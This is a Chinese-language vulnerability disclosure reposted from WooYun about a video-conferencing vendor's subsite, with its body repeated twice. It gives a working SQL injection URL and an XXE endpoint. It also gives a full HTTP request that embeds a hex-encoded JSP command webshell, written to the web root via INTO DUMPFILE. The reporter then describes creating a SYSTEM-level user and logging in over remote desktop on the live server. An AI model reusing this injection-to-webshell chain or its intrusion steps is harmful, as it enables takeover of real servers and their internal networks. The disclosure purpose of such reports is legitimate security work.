神刀安全网

漏洞标题: 威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

简要描述:

此漏洞之前有爆出过,作为厂商但是不知道为何只是头痛医头,脚痛医脚,把一个分站的问题修补了其他分站的问题就不管了?自己的分站系统安全性都没有做到位,客户会放心使用你们的产品吗?

详细说明:

http://**.**.**.**

公司简介

北京威速科技有限公司(简称威速V2)成立于2001年,自成立以来,公司一直致力于为全球客户提供世界领先的视频会议软件产品及各领域视频会议解决方案。公司客户遍布政府、制造业、能源行业、零售业、医疗行业、交通物流、电信、金融、教育及海外等众多领域,汇聚包括沃尔玛、可口可乐、中石油等全球500强企业在内的6000多家国内外知名企业和机构。

问题地址:http://**.**.**.**/Conf/jsp/main/mainAction.do

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

1、sql注入点:

http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,database(),5%23

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

2、外部实体注入点

http://**.**.**.**/Conf/services/ConferenceWebService?wsdl

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

通过构造payload数据包请求上传shell

code 区域
POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded

sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

将小马进行编码然后通过mysql执行文件导出,获得shell。

成功getshell,system权限创建了test用户

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

主机未开启3389端口,tasklist /svc通过查找termserver服务,然后根据服务找到端口映射之后的远程桌面端口39667进行桌面连接

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

连接成功,不在继续了,可作跳板主机进行内网测试。

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

参考资料:http://**.**.**.**/bugs/wooyun-2010-0143276

shell:http://**.**.**.**/cmd.jsp?cmd=whoami

系统用户:test test

漏洞证明:

http://**.**.**.**

公司简介

北京威速科技有限公司(简称威速V2)成立于2001年,自成立以来,公司一直致力于为全球客户提供世界领先的视频会议软件产品及各领域视频会议解决方案。公司客户遍布政府、制造业、能源行业、零售业、医疗行业、交通物流、电信、金融、教育及海外等众多领域,汇聚包括沃尔玛、可口可乐、中石油等全球500强企业在内的6000多家国内外知名企业和机构。

问题地址:http://**.**.**.**/Conf/jsp/main/mainAction.do

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

1、sql注入点:

http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,database(),5%23

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

2、外部实体注入点

http://**.**.**.**/Conf/services/ConferenceWebService?wsdl

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

通过构造payload数据包请求上传shell

code 区域
POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded

sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

将小马进行编码然后通过mysql执行文件导出,获得shell。

成功getshell,system权限创建了test用户

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

主机未开启3389端口,tasklist /svc通过查找termserver服务,然后根据服务找到端口映射之后的远程桌面端口39667进行桌面连接

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

连接成功,不在继续了,可作跳板主机进行内网测试。

漏洞标题:  威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

参考资料:http://**.**.**.**/bugs/wooyun-2010-0143276

shell:http://**.**.**.**/cmd.jsp?cmd=whoami

系统用户:test test

修复方案:

删除shell、test用户,对参数进行过滤,修复xee

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址